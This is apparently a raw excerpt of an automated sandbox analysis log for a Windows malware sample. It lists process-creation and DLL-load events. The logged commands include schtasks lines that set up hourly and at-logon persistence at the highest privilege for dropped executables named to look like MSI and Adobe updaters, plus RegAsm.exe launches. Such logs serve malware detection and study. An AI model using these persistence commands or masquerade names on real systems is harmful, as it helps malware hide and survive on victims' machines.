Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe "C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe"
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 276
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\MPGPH1\MPGPH1.exe C:\ProgramData\MPGPH1\MPGPH1.exe
Source: unknown	Process created: C:\ProgramData\MPGPH1\MPGPH1.exe C:\ProgramData\MPGPH1\MPGPH1.exe
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MPGPH1\MPGPH1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 288
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 248
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe "C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe"	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR" /sc HOURLY /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG" /sc ONLOGON /rl HIGHEST	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Process created: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe "C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 LG" /sc ONLOGON /rl HIGHEST
Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\OJa1BOigU3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe	Section loaded: d3d11.dll	Jump to behavior
